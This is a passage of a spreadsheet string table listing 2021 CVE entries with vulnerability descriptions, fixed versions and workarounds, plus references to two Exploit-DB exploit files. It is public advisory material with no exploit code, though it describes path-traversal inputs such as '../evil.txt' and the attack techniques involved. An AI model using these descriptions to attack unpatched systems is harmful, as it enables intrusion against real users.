    <t>CVE-2021-32800</t>
  </si>
  <si>
    <t>Nextcloud server is an open source, self hosted personal cloud. In affected versions an attacker is able to bypass Two Factor Authentication in Nextcloud. Thus knowledge of a password, or access to a WebAuthN trusted device of a user was sufficient to gain access to an account. It is recommended that the Nextcloud Server is upgraded to 20.0.12, 21.0.4 or 22.1.0. There are no workaround for this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-32801</t>
  </si>
  <si>
    <t>Nextcloud server is an open source, self hosted personal cloud. In affected versions logging of exceptions may have resulted in logging potentially sensitive key material for the Nextcloud Encryption-at-Rest functionality. It is recommended that the Nextcloud Server is upgraded to 20.0.12, 21.0.4 or 22.1.0. If upgrading is not an option users are advised to disable system logging to resolve this issue until such time that an upgrade can be performed Note that ff you do not use the Encryption-at-Rest functionality of Nextcloud you are not affected by this bug.</t>
  </si>
  <si>
    <t>CVE-2021-32802</t>
  </si>
  <si>
    <t>Nextcloud server is an open source, self hosted personal cloud. Nextcloud supports rendering image previews for user provided file content. For some image types, the Nextcloud server was invoking a third-party library that wasn't suited for untrusted user-supplied content. There are several security concerns with passing user-generated content to this library, such as Server-Side-Request-Forgery, file disclosure or potentially executing code on the system. The risk depends on your system configuration and the installed library version. It is recommended that the Nextcloud Server is upgraded to 20.0.12, 21.0.4 or 22.1.0. These versions do not use this library anymore. As a workaround users may disable previews by setting `enable_previews` to `false` in `config.php`.</t>
  </si>
  <si>
    <t>CVE-2021-32803</t>
  </si>
  <si>
    <t>The npm package "tar" (aka node-tar) before versions 6.1.2, 5.0.7, 4.4.15, and 3.2.3 has an arbitrary File Creation/Overwrite vulnerability via insufficient symlink protection. `node-tar` aims to guarantee that any file whose location would be modified by a symbolic link is not extracted. This is, in part, achieved by ensuring that extracted directories are not symlinks. Additionally, in order to prevent unnecessary `stat` calls to determine whether a given path is a directory, paths are cached when directories are created. This logic was insufficient when extracting tar files that contained both a directory and a symlink with the same name as the directory. This order of operations resulted in the directory being created and added to the `node-tar` directory cache. When a directory is present in the directory cache, subsequent calls to mkdir for that directory are skipped. However, this is also where `node-tar` checks for symlinks occur. By first creating a directory, and then replacing that directory with a symlink, it was thus possible to bypass `node-tar` symlink checks on directories, essentially allowing an untrusted tar file to symlink into an arbitrary location and subsequently extracting arbitrary files into that location, thus allowing arbitrary file creation and overwrite. This issue was addressed in releases 3.2.3, 4.4.15, 5.0.7 and 6.1.2.</t>
  </si>
  <si>
    <t>CVE-2021-32804</t>
  </si>
  <si>
    <t>The npm package "tar" (aka node-tar) before versions 6.1.1, 5.0.6, 4.4.14, and 3.3.2 has a arbitrary File Creation/Overwrite vulnerability due to insufficient absolute path sanitization. node-tar aims to prevent extraction of absolute file paths by turning absolute paths into relative paths when the `preservePaths` flag is not set to `true`. This is achieved by stripping the absolute path root from any absolute file paths contained in a tar file. For example `/home/user/.bashrc` would turn into `home/user/.bashrc`. This logic was insufficient when file paths contained repeated path roots such as `////home/user/.bashrc`. `node-tar` would only strip a single path root from such paths. When given an absolute file path with repeating path roots, the resulting path (e.g. `///home/user/.bashrc`) would still resolve to an absolute path, thus allowing arbitrary file creation and overwrite. This issue was addressed in releases 3.2.2, 4.4.14, 5.0.6 and 6.1.1. Users may work around this vulnerability without upgrading by creating a custom `onentry` method which sanitizes the `entry.path` or a `filter` method which removes entries with absolute paths. See referenced GitHub Advisory for details. Be aware of CVE-2021-32803 which fixes a similar bug in later versions of tar.</t>
  </si>
  <si>
    <t>CVE-2021-32805</t>
  </si>
  <si>
    <t>Flask-AppBuilder is an application development framework, built on top of Flask. In affected versions if using Flask-AppBuilder OAuth, an attacker can share a carefully crafted URL with a trusted domain for an application built with Flask-AppBuilder, this URL can redirect a user to a malicious site. This is an open redirect vulnerability. To resolve this issue upgrade to Flask-AppBuilder 3.2.2 or above. If upgrading is infeasible users may filter HTTP traffic containing `?next={next-site}` where the `next-site` domain is different from the application you are protecting as a workaround.</t>
  </si>
  <si>
    <t>CVE-2021-32806</t>
  </si>
  <si>
    <t>Products.isurlinportal is a replacement for isURLInPortal method in Plone. Versions of Products.isurlinportal prior to 1.2.0 have an Open Redirect vulnerability. Various parts of Plone use the 'is url in portal' check for security, mostly to see if it is safe to redirect to a url. A url like `https://example.org` is not in the portal. The url `https:example.org` without slashes is considered to be in the portal. When redirecting, some browsers go to `https://example.org`, others give an error. Attackers may use this to redirect victims to their site, especially as part of a phishing attack. The problem has been patched in Products.isurlinportal 1.2.0.</t>
  </si>
  <si>
    <t>CVE-2021-32807</t>
  </si>
  <si>
    <t>The module `AccessControl` defines security policies for Python code used in restricted code within Zope applications. Restricted code is any code that resides in Zope's object database, such as the contents of `Script (Python)` objects. The policies defined in `AccessControl` severely restrict access to Python modules and only exempt a few that are deemed safe, such as Python's `string` module. However, full access to the `string` module also allows access to the class `Formatter`, which can be overridden and extended within `Script (Python)` in a way that provides access to other unsafe Python libraries. Those unsafe Python libraries can be used for remote code execution. By default, you need to have the admin-level Zope "Manager" role to add or edit `Script (Python)` objects through the web. Only sites that allow untrusted users to add/edit these scripts through the web - which would be a very unusual configuration to begin with - are at risk. The problem has been fixed in AccessControl 4.3 and 5.2. Only AccessControl versions 4 and 5 are vulnerable, and only on Python 3, not Python 2.7. As a workaround, a site administrator can restrict adding/editing `Script (Python)` objects through the web using the standard Zope user/role permission mechanisms. Untrusted users should not be assigned the Zope Manager role and adding/editing these scripts through the web should be restricted to trusted users only. This is the default configuration in Zope.</t>
  </si>
  <si>
    <t>CVE-2021-32808</t>
  </si>
  <si>
    <t>ckeditor is an open source WYSIWYG HTML editor with rich content support. A vulnerability has been discovered in the clipboard Widget plugin if used alongside the undo feature. The vulnerability allows a user to abuse undo functionality using malformed widget HTML, which could result in executing JavaScript code. It affects all users using the CKEditor 4 plugins listed above at version &gt;= 4.13.0. The problem has been recognized and patched. The fix will be available in version 4.16.2.</t>
  </si>
  <si>
    <t>CVE-2021-32809</t>
  </si>
  <si>
    <t>ckeditor is an open source WYSIWYG HTML editor with rich content support. A potential vulnerability has been discovered in CKEditor 4 [Clipboard](https://ckeditor.com/cke4/addon/clipboard) package. The vulnerability allowed to abuse paste functionality using malformed HTML, which could result in injecting arbitrary HTML into the editor. It affects all users using the CKEditor 4 plugins listed above at version &gt;= 4.5.2. The problem has been recognized and patched. The fix will be available in version 4.16.2.</t>
  </si>
  <si>
    <t>CVE-2021-3281</t>
  </si>
  <si>
    <t>In Django 2.2 before 2.2.18, 3.0 before 3.0.12, and 3.1 before 3.1.6, the django.utils.archive.extract method (used by "startapp --template" and "startproject --template") allows directory traversal via an archive with absolute paths or relative paths with dot segments.</t>
  </si>
  <si>
    <t>CVE-2021-32810</t>
  </si>
  <si>
    <t>crossbeam-deque is a package of work-stealing deques for building task schedulers when programming in Rust. In versions prior to 0.7.4 and 0.8.0, the result of the race condition is that one or more tasks in the worker queue can be popped twice instead of other tasks that are forgotten and never popped. If tasks are allocated on the heap, this can cause double free and a memory leak. If not, this still can cause a logical bug. Crates using `Stealer::steal`, `Stealer::steal_batch`, or `Stealer::steal_batch_and_pop` are affected by this issue. This has been fixed in crossbeam-deque 0.8.1 and 0.7.4.</t>
  </si>
  <si>
    <t>CVE-2021-32811</t>
  </si>
  <si>
    <t>Zope is an open-source web application server. Zope versions prior to versions 4.6.3 and 5.3 have a remote code execution security issue. In order to be affected, one must use Python 3 for one's Zope deployment, run Zope 4 below version 4.6.3 or Zope 5 below version 5.3, and have the optional `Products.PythonScripts` add-on package installed. By default, one must have the admin-level Zope "Manager" role to add or edit Script (Python) objects through the web. Only sites that allow untrusted users to add/edit these scripts through the web are at risk. Zope releases 4.6.3 and 5.3 are not vulnerable. As a workaround, a site administrator can restrict adding/editing Script (Python) objects through the web using the standard Zope user/role permission mechanisms. Untrusted users should not be assigned the Zope Manager role and adding/editing these scripts through the web should be restricted to trusted users only. This is the default configuration in Zope.</t>
  </si>
  <si>
    <t>CVE-2021-32812</t>
  </si>
  <si>
    <t>Monkshu is an enterprise application server for mobile apps (iOS and Android), responsive HTML 5 apps, and JSON API services. In version 2.90 and earlier, there is a reflected cross-site scripting vulnerability in frontend HTTP server. The attacker can send in a carefully crafted URL along with a known bug in the server which will cause a 500 error, and the response will then embed the URL provided by the hacker. The impact is moderate as the hacker must also be able to craft an HTTP request which should cause a 500 server error. None such requests are known as this point. The issue is patched in version 2.95. As a workaround, one may use a disk caching plugin.</t>
  </si>
  <si>
    <t>CVE-2021-32813</t>
  </si>
  <si>
    <t>Traefik is an HTTP reverse proxy and load balancer. Prior to version 2.4.13, there exists a potential header vulnerability in Traefik's handling of the Connection header. Active exploitation of this issue is unlikely, as it requires that a removed header would lead to a privilege escalation, however, the Traefik team has addressed this issue to prevent any potential abuse. If one has a chain of Traefik middlewares, and one of them sets a request header, then sending a request with a certain Connection header will cause it to be removed before the request is sent. In this case, the backend does not see the request header. A patch is available in version 2.4.13. There are no known workarounds aside from upgrading.</t>
  </si>
  <si>
    <t>CVE-2021-32814</t>
  </si>
  <si>
    <t>Skytable is a NoSQL database with automated snapshots and TLS. Versions prior to 0.5.1 are vulnerable to a a directory traversal attack enabling remotely connected clients to destroy and/or manipulate critical files on the host's file system. This security bug has been patched in version 0.5.1. There are no known workarounds aside from upgrading.</t>
  </si>
  <si>
    <t>CVE-2021-32815</t>
  </si>
  <si>
    <t>Exiv2 is a command-line utility and C++ library for reading, writing, deleting, and modifying the metadata of image files. The assertion failure is triggered when Exiv2 is used to modify the metadata of a crafted image file. An attacker could potentially exploit the vulnerability to cause a denial of service, if they can trick the victim into running Exiv2 on a crafted image file. Note that this bug is only triggered when modifying the metadata, which is a less frequently used Exiv2 operation than reading the metadata. For example, to trigger the bug in the Exiv2 command-line application, you need to add an extra command-line argument such as `fi`. ### Patches The bug is fixed in version v0.27.5. ### References Regression test and bug fix: #1739 ### For more information Please see our [security policy](https://github.com/Exiv2/exiv2/security/policy) for information about Exiv2 security.</t>
  </si>
  <si>
    <t>CVE-2021-32816</t>
  </si>
  <si>
    <t>ProtonMail Web Client is the official AngularJS web client for the ProtonMail secure email service. ProtonMail Web Client before version 3.16.60 has a regular expression denial-of-service vulnerability. This was fixed in commit 6687fb. There is a full report available in the referenced GHSL-2021-027.</t>
  </si>
  <si>
    <t>CVE-2021-32817</t>
  </si>
  <si>
    <t>express-hbs is an Express handlebars template engine. express-hbs mixes pure template data with engine configuration options through the Express render API. More specifically, the layout parameter may trigger file disclosure vulnerabilities in downstream applications. This potential vulnerability is somewhat restricted in that only files with existing extentions (i.e. file.extension) can be included, files that lack an extension will have .hbs appended to them. For complete details refer to the referenced GHSL-2021-019 report. Notes in documentation have been added to help users of express-hbs avoid this potential information exposure vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-32818</t>
  </si>
  <si>
    <t>haml-coffee is a JavaScript templating solution. haml-coffee mixes pure template data with engine configuration options through the Express render API. More specifically, haml-coffee supports overriding a series of HTML helper functions through its configuration options. A vulnerable application that passes user controlled request objects to the haml-coffee template engine may introduce RCE vulnerabilities. Additionally control over the escapeHtml parameter through template configuration pollution ensures that haml-coffee would not sanitize template inputs that may result in reflected Cross Site Scripting attacks against downstream applications. There is currently no fix for these issues as of the publication of this CVE. The latest version of haml-coffee is currently 1.14.1. For complete details refer to the referenced GHSL-2021-025.</t>
  </si>
  <si>
    <t>CVE-2021-32819</t>
  </si>
  <si>
    <t>Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. There is currently no fix for these issues as of the publication of this CVE. The latest version of squirrelly is currently 8.0.8. For complete details refer to the referenced GHSL-2021-023.</t>
  </si>
  <si>
    <t>CVE-2021-3282</t>
  </si>
  <si>
    <t>HashiCorp Vault Enterprise 1.6.0 &amp; 1.6.1 allowed the `remove-peer` raft operator command to be executed against DR secondaries without authentication. Fixed in 1.6.2.</t>
  </si>
  <si>
    <t>CVE-2021-32820</t>
  </si>
  <si>
    <t>Express-handlebars is a Handlebars view engine for Express. Express-handlebars mixes pure template data with engine configuration options through the Express render API. More specifically, the layout parameter may trigger file disclosure vulnerabilities in downstream applications. This potential vulnerability is somewhat restricted in that only files with existing extentions (i.e. file.extension) can be included, files that lack an extension will have .handlebars appended to them. For complete details refer to the referenced GHSL-2021-018 report. Notes in documentation have been added to help users avoid this potential information exposure vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-32822</t>
  </si>
  <si>
    <t>The npm hbs package is an Express view engine wrapper for Handlebars. Depending on usage, users of hbs may be vulnerable to a file disclosure vulnerability. There is currently no patch for this vulnerability. hbs mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options a file disclosure vulnerability may be triggered in downstream applications. For an example PoC see the referenced GHSL-2021-020.</t>
  </si>
  <si>
    <t>CVE-2021-32823</t>
  </si>
  <si>
    <t>In the bindata RubyGem before version 2.4.10 there is a potential denial-of-service vulnerability. In affected versions it is very slow for certain classes in BinData to be created. For example BinData::Bit100000, BinData::Bit100001, BinData::Bit100002, BinData::Bit&lt;N&gt;. In combination with &lt;user_input&gt;.constantize there is a potential for a CPU-based DoS. In version 2.4.10 bindata improved the creation time of Bits and Integers.</t>
  </si>
  <si>
    <t>CVE-2021-32825</t>
  </si>
  <si>
    <t>bblfshd is an open source self-hosted server for source code parsing. In bblfshd before commit 4265465b9b6fb5663c30ee43806126012066aad4 there is a "zipslip" vulnerability. The unsafe handling of symbolic links in an unpacking routine may enable attackers to read and/or write to arbitrary locations outside the designated target folder. This issue may lead to arbitrary file write (with same permissions as the program running the unpack operation) if the attacker can control the archive file. Additionally, if the attacker has read access to the unpacked files, he may be able to read arbitrary system files the parent process has permissions to read. For more details including a PoC see the referenced GHSL-2020-258.</t>
  </si>
  <si>
    <t>CVE-2021-32826</t>
  </si>
  <si>
    <t>Proxyee-Down is open source proxy software. An attacker being able to provide an extension script (eg: through a MiTM attack or by hosting a malicious extension) may be able to run arbitrary commands on the system running Proxyee-Down. For more details including a PoC see the referenced GHSL-2021-053. As of the writing of this CVE there is currently no patched version.</t>
  </si>
  <si>
    <t>CVE-2021-32827</t>
  </si>
  <si>
    <t>MockServer is open source software which enables easy mocking of any system you integrate with via HTTP or HTTPS. An attacker that can trick a victim into visiting a malicious site while running MockServer locally, will be able to run arbitrary code on the MockServer machine. With an overly broad default CORS configuration MockServer allows any site to send cross-site requests. Additionally, MockServer allows you to create dynamic expectations using Javascript or Velocity templates. Both engines may allow an attacker to execute arbitrary code on-behalf of MockServer. By combining these two issues (Overly broad CORS configuration + Script injection), an attacker could serve a malicious page so that if a developer running MockServer visits it, they will get compromised. For more details including a PoC see the referenced GHSL-2021-059.</t>
  </si>
  <si>
    <t>CVE-2021-32829</t>
  </si>
  <si>
    <t>ZStack is open source IaaS(infrastructure as a service) software aiming to automate datacenters, managing resources of compute, storage, and networking all by APIs. Affected versions of ZStack REST API are vulnerable to post-authentication Remote Code Execution (RCE) via bypass of the Groovy shell sandbox. The REST API exposes the GET zstack/v1/batch-queries?script endpoint which is backed up by the BatchQueryAction class. Messages are represented by the APIBatchQueryMsg, dispatched to the QueryFacadeImpl facade and handled by the BatchQuery class. The HTTP request parameter script is mapped to the APIBatchQueryMsg.script property and evaluated as a Groovy script in BatchQuery.query the evaluation of the user-controlled Groovy script is sandboxed by SandboxTransformer which will apply the restrictions defined in the registered (sandbox.register()) GroovyInterceptor. Even though the sandbox heavily restricts the receiver types to a small set of allowed types, the sandbox is non effective at controlling any code placed in Java annotations and therefore vulnerable to meta-programming escapes. This issue leads to post-authenticated remote code execution. For more details see the referenced GHSL-2021-065. This issue is patched in versions 3.8.21, 3.10.8, and 4.1.0.</t>
  </si>
  <si>
    <t>CVE-2021-3283</t>
  </si>
  <si>
    <t>HashiCorp Nomad and Nomad Enterprise up to 0.12.9 exec and java task drivers can access processes associated with other tasks on the same node. Fixed in 0.12.10, and 1.0.3.</t>
  </si>
  <si>
    <t>CVE-2021-32830</t>
  </si>
  <si>
    <t>The @diez/generation npm package is a client for Diez. The locateFont method of @diez/generation has a command injection vulnerability. Clients of the @diez/generation library are unlikely to be aware of this, so they might unwittingly write code that contains a vulnerability. This issue may lead to remote code execution if a client of the library calls the vulnerable method with untrusted input. All versions of this package are vulnerable as of the writing of this CVE.</t>
  </si>
  <si>
    <t>CVE-2021-32831</t>
  </si>
  <si>
    <t>Total.js framework (npm package total.js) is a framework for Node.js platfrom written in pure JavaScript similar to PHP's Laravel or Python's Django or ASP.NET MVC. In total.js framework before version 3.4.9, calling the utils.set function with user-controlled values leads to code-injection. This can cause a variety of impacts that include arbitrary code execution. This is fixed in version 3.4.9.</t>
  </si>
  <si>
    <t>CVE-2021-32832</t>
  </si>
  <si>
    <t>Rocket.Chat is an open-source fully customizable communications platform developed in JavaScript. In Rocket.Chat before versions 3.11.3, 3.12.2, and 3.13 an issue with certain regular expressions could lead potentially to Denial of Service. This was fixed in versions 3.11.3, 3.12.2, and 3.13.</t>
  </si>
  <si>
    <t>CVE-2021-32833</t>
  </si>
  <si>
    <t>Emby Server is a personal media server with apps on many devices. In Emby Server on Windows there is a set of arbitrary file read vulnerabilities. This vulnerability is known to exist in version 4.6.4.0 and may not be patched in later versions. Known vulnerable routes are /Videos/Id/hls/PlaylistId/SegmentId.SegmentContainer, /Images/Ratings/theme/name and /Images/MediaInfo/theme/name. For more details including proof of concept code, refer to the referenced GHSL-2021-051. This issue may lead to unauthorized access to the system especially when Emby Server is configured to be accessible from the Internet.</t>
  </si>
  <si>
    <t>CVE-2021-32834</t>
  </si>
  <si>
    <t>Eclipse Keti is a service that was designed to protect RESTfuls API using Attribute Based Access Control (ABAC). In Keti a user able to create Policy Sets can run arbitrary code by sending malicious Groovy scripts which will escape the configured Groovy sandbox. This vulnerability is known to exist in the latest commit at the time of writing this CVE (commit a1c8dbe). For more details see the referenced GHSL-2021-063.</t>
  </si>
  <si>
    <t>CVE-2021-32835</t>
  </si>
  <si>
    <t>Eclipse Keti is a service that was designed to protect RESTfuls API using Attribute Based Access Control (ABAC). In Keti a sandbox escape vulnerability may lead to post-authentication Remote Code execution. This vulnerability is known to exist in the latest commit at the time of writing this CVE (commit a1c8dbe). For more details see the referenced GHSL-2021-063.</t>
  </si>
  <si>
    <t>CVE-2021-32836</t>
  </si>
  <si>
    <t>ZStack is open source IaaS(infrastructure as a service) software. In ZStack before versions 3.10.12 and 4.1.6 there is a pre-auth unsafe deserialization vulnerability in the REST API. An attacker in control of the request body will be able to provide both the class name and the data to be deserialized and therefore will be able to instantiate an arbitrary type and assign arbitrary values to its fields. This issue may lead to a Denial Of Service. If a suitable gadget is available, then an attacker may also be able to exploit this vulnerability to gain pre-auth remote code execution. For additional details see the referenced GHSL-2021-087.</t>
  </si>
  <si>
    <t>CVE-2021-32838</t>
  </si>
  <si>
    <t>Flask-RESTX (pypi package flask-restx) is a community driven fork of Flask-RESTPlus. Flask-RESTX before version 0.5.1 is vulnerable to ReDoS (Regular Expression Denial of Service) in email_regex. This is fixed in version 0.5.1.</t>
  </si>
  <si>
    <t>CVE-2021-32839</t>
  </si>
  <si>
    <t>sqlparse is a non-validating SQL parser module for Python. In sqlparse versions 0.4.0 and 0.4.1 there is a regular Expression Denial of Service in sqlparse vulnerability. The regular expression may cause exponential backtracking on strings containing many repetitions of '\r\n' in SQL comments. Only the formatting feature that removes comments from SQL statements is affected by this regular expression. As a workaround don't use the sqlformat.format function with keyword strip_comments=True or the --strip-comments command line flag when using the sqlformat command line tool. The issues has been fixed in sqlparse 0.4.2.</t>
  </si>
  <si>
    <t>CVE-2021-32840</t>
  </si>
  <si>
    <t>SharpZipLib (or #ziplib) is a Zip, GZip, Tar and BZip2 library. Prior to version 1.3.3, a TAR file entry `../evil.txt` may be extracted in the parent directory of `destFolder`. This leads to arbitrary file write that may lead to code execution. The vulnerability was patched in version 1.3.3.</t>
  </si>
  <si>
    <t>CVE-2021-32841</t>
  </si>
  <si>
    <t>SharpZipLib (or #ziplib) is a Zip, GZip, Tar and BZip2 library. Starting version 1.3.0 and prior to version 1.3.3, a check was added if the destination file is under destination directory. However, it is not enforced that `destDir` ends with slash. If the `destDir` is not slash terminated like `/home/user/dir` it is possible to create a file with a name thats begins with the destination directory, i.e. `/home/user/dir.sh`. Because of the file name and destination directory constraints, the arbitrary file creation impact is limited and depends on the use case. Version 1.3.3 contains a patch for this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-32842</t>
  </si>
  <si>
    <t>SharpZipLib (or #ziplib) is a Zip, GZip, Tar and BZip2 library. Starting version 1.0.0 and prior to version 1.3.3, a check was added if the destination file is under a destination directory. However, it is not enforced that `_baseDirectory` ends with slash. If the _baseDirectory is not slash terminated like `/home/user/dir` it is possible to create a file with a name thats begins as the destination directory one level up from the directory, i.e. `/home/user/dir.sh`. Because of the file name and destination directory constraints, the arbitrary file creation impact is limited and depends on the use case. Version 1.3.3 fixed this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-32849</t>
  </si>
  <si>
    <t>Gerapy is a distributed crawler management framework. Prior to version 0.9.9, an authenticated user could execute arbitrary commands. This issue is fixed in version 0.9.9. There are no known workarounds.</t>
  </si>
  <si>
    <t>CVE-2021-3285</t>
  </si>
  <si>
    <t>jxbrowser in TI Code Composer Studio IDE 8.x through 10.x before 10.1.1 does not verify X.509 certificates for HTTPS.</t>
  </si>
  <si>
    <t>CVE-2021-3286</t>
  </si>
  <si>
    <t>SQL injection exists in Spotweb 1.4.9 because the notAllowedCommands protection mechanism is inadequate, e.g., a variation of the payload may be used. NOTE: this issue exists because of an incomplete fix for CVE-2020-35545.</t>
  </si>
  <si>
    <t>CVE-2021-32862</t>
  </si>
  <si>
    <t>The GitHub Security Lab discovered sixteen ways to exploit a cross-site scripting vulnerability in nbconvert. When using nbconvert to generate an HTML version of a user-controllable notebook, it is possible to inject arbitrary HTML which may lead to cross-site scripting (XSS) vulnerabilities if these HTML notebooks are served by a web server (eg: nbviewer).</t>
  </si>
  <si>
    <t>CVE-2021-3287</t>
  </si>
  <si>
    <t>Zoho ManageEngine OpManager before 12.5.329 allows unauthenticated Remote Code Execution due to a general bypass in the deserialization class.</t>
  </si>
  <si>
    <t>CVE-2021-3291</t>
  </si>
  <si>
    <t>Zen Cart 1.5.7b allows admins to execute arbitrary OS commands by inspecting an HTML radio input element (within the modules edit page) and inserting a command.</t>
  </si>
  <si>
    <t>exploits/php/webapps/49608.rb</t>
  </si>
  <si>
    <t>Zen Cart 1.5.7b - Remote Code Execution (Authenticated)</t>
  </si>
  <si>
    <t>CVE-2021-32917</t>
  </si>
  <si>
    <t>An issue was discovered in Prosody before 0.11.9. The proxy65 component allows open access by default, even if neither of the users has an XMPP account on the local server, allowing unrestricted use of the server's bandwidth.</t>
  </si>
  <si>
    <t>CVE-2021-32918</t>
  </si>
  <si>
    <t>An issue was discovered in Prosody before 0.11.9. Default settings are susceptible to remote unauthenticated denial-of-service (DoS) attacks via memory exhaustion when running under Lua 5.2 or Lua 5.3.</t>
  </si>
  <si>
    <t>CVE-2021-32919</t>
  </si>
  <si>
    <t>An issue was discovered in Prosody before 0.11.9. The undocumented dialback_without_dialback option in mod_dialback enables an experimental feature for server-to-server authentication. It does not correctly authenticate remote server certificates, allowing a remote server to impersonate another server (when this option is enabled).</t>
  </si>
  <si>
    <t>CVE-2021-32920</t>
  </si>
  <si>
    <t>Prosody before 0.11.9 allows Uncontrolled CPU Consumption via a flood of SSL/TLS renegotiation requests.</t>
  </si>
  <si>
    <t>CVE-2021-32921</t>
  </si>
  <si>
    <t>An issue was discovered in Prosody before 0.11.9. It does not use a constant-time algorithm for comparing certain secret strings when running under Lua 5.2 or later. This can potentially be used in a timing attack to reveal the contents of secret strings to an attacker.</t>
  </si>
  <si>
    <t>CVE-2021-32923</t>
  </si>
  <si>
    <t>HashiCorp Vault and Vault Enterprise allowed the renewal of nearly-expired token leases and dynamic secret leases (specifically, those within 1 second of their maximum TTL), which caused them to be incorrectly treated as non-expiring during subsequent use. Fixed in 1.5.9, 1.6.5, and 1.7.2.</t>
  </si>
  <si>
    <t>CVE-2021-32924</t>
  </si>
  <si>
    <t>Invision Community (aka IPS Community Suite) before 4.6.0 allows eval-based PHP code injection by a moderator because the IPS\cms\modules\front\pages\_builder::previewBlock method interacts unsafely with the IPS\_Theme::runProcessFunction method.</t>
  </si>
  <si>
    <t>CVE-2021-32925</t>
  </si>
  <si>
    <t>admin/user_import.php in Chamilo 1.11.x reads XML data without disabling the ability to load external entities.</t>
  </si>
  <si>
    <t>CVE-2021-32926</t>
  </si>
  <si>
    <t>When an authenticated password change request takes place, this vulnerability could allow the attacker to intercept the message that includes the legitimate, new password hash and replace it with an illegitimate hash. The user would no longer be able to authenticate to the controller (Micro800: All versions, MicroLogix 1400: Version 21 and later) causing a denial-of-service condition</t>
  </si>
  <si>
    <t>CVE-2021-32927</t>
  </si>
  <si>
    <t>An attacker may be able to inject client-side JavaScript code on multiple instances within all versions of Uffizio GPS Tracker.</t>
  </si>
  <si>
    <t>CVE-2021-32928</t>
  </si>
  <si>
    <t>The Sentinel LDK Run-Time Environment installer (Versions 7.6 and prior) adds a firewall rule named “Sentinel License Manager” that allows incoming connections from private networks using TCP Port 1947. While uninstalling, the uninstaller fails to close Port 1947.</t>
  </si>
  <si>
    <t>CVE-2021-32929</t>
  </si>
  <si>
    <t>All versions of Uffizio GPS Tracker may allow an attacker to perform unintended actions on behalf of a user.</t>
  </si>
  <si>
    <t>CVE-2021-3293</t>
  </si>
  <si>
    <t>emlog v5.3.1 has full path disclosure vulnerability in t/index.php, which allows an attacker to see the path to the webroot/file.</t>
  </si>
  <si>
    <t>CVE-2021-32930</t>
  </si>
  <si>
    <t>The affected product’s configuration is vulnerable due to missing authentication, which may allow an attacker to change configurations and execute arbitrary code on the iView (versions prior to v5.7.03.6182).</t>
  </si>
  <si>
    <t>CVE-2021-32931</t>
  </si>
  <si>
    <t>An uninitialized pointer in FATEK Automation FvDesigner, Versions 1.5.88 and prior may be exploited while the application is processing project files, allowing an attacker to craft a special project file that may permit arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-32932</t>
  </si>
  <si>
    <t>The affected product is vulnerable to a SQL injection, which may allow an unauthorized attacker to disclose information on the iView (versions prior to v5.7.03.6182).</t>
  </si>
  <si>
    <t>CVE-2021-32933</t>
  </si>
  <si>
    <t>An attacker could leverage an API to pass along a malicious file that could then manipulate the process creation command line in MDT AutoSave versions prior to v6.02.06 and run a command line argument. This could then be leveraged to run a malicious process.</t>
  </si>
  <si>
    <t>CVE-2021-32934</t>
  </si>
  <si>
    <t>The affected ThroughTek P2P products (SDKs using versions before 3.1.5, any versions with nossl tag, device firmware not using AuthKey for IOTC conneciton, firmware using AVAPI module without enabling DTLS mechanism, and firmware using P2PTunnel or RDT module) do not sufficiently protect data transferred between the local device and ThroughTek servers. This can allow an attacker to access sensitive information, such as camera feeds.</t>
  </si>
  <si>
    <t>CVE-2021-32935</t>
  </si>
  <si>
    <t>The affected Cognex product, the In-Sight OPC Server versions v5.7.4 (96) and prior, deserializes untrusted data, which could allow a remote attacker access to system level permission commands and local privilege escalation.</t>
  </si>
  <si>
    <t>CVE-2021-32936</t>
  </si>
  <si>
    <t>An out-of-bounds write issue exists in the DXF file-recovering procedure in the Drawings SDK (All versions prior to 2022.4) resulting from the lack of proper validation of user-supplied data. This can result in a write past the end of an allocated buffer and allow attackers to cause a denial-of-service condition or execute code in the context of the current process.</t>
  </si>
  <si>
    <t>CVE-2021-32937</t>
  </si>
  <si>
    <t>An attacker can gain knowledge of a session temporary working folder where the getfile and putfile commands are used in MDT AutoSave versions prior to v6.02.06. An attacker can leverage this knowledge to provide a malicious command to the working directory where the read and write activity can be initiated.</t>
  </si>
  <si>
    <t>CVE-2021-32938</t>
  </si>
  <si>
    <t>Drawings SDK (All versions prior to 2022.4) are vulnerable to an out-of-bounds read due to parsing of DWG files resulting from the lack of proper validation of user-supplied data. This can result in a read past the end of an allocated buffer and allows attackers to cause a denial-of service condition or read sensitive information from memory.</t>
  </si>
  <si>
    <t>CVE-2021-32939</t>
  </si>
  <si>
    <t>FATEK Automation FvDesigner, Versions 1.5.88 and prior is vulnerable to an out-of-bounds write while processing project files, allowing an attacker to craft a project file that may permit arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-3294</t>
  </si>
  <si>
    <t>CASAP Automated Enrollment System 1.0 is affected by cross-site scripting (XSS) in users.php. An attacker can steal a cookie to perform user redirection to a malicious website.</t>
  </si>
  <si>
    <t>exploits/php/webapps/49469.txt</t>
  </si>
  <si>
    <t>CASAP Automated Enrollment System 1.0 - 'First Name' Stored XSS</t>
  </si>
  <si>
    <t>CVE-2021-32940</t>
  </si>
  <si>
    <t>An out-of-bounds read issue exists in the DWG file-recovering procedure in the Drawings SDK (All versions prior to 2022.4) resulting from the lack of proper validation of user-supplied data. This can result in a read past the end of an allocated buffer and allow attackers to cause a denial-of-service condition or read sensitive information from memory locations.</t>
  </si>
  <si>
    <t>CVE-2021-32941</t>
  </si>
  <si>
    <t>Annke N48PBB (Network Video Recorder) products of version 3.4.106 build 200422 and prior are vulnerable to a stack-based buffer overflow, which allows an unauthorized remote attacker to execute arbitrary code with the same privileges as the server user (root).</t>
  </si>
  <si>
    <t>CVE-2021-32942</t>
  </si>
  <si>
    <t>The vulnerability could expose cleartext credentials from AVEVA InTouch Runtime 2020 R2 and all prior versions (WindowViewer) if an authorized, privileged user creates a diagnostic memory dump of the process and saves it to a non-protected location.</t>
  </si>
  <si>
    <t>CVE-2021-32943</t>
  </si>
  <si>
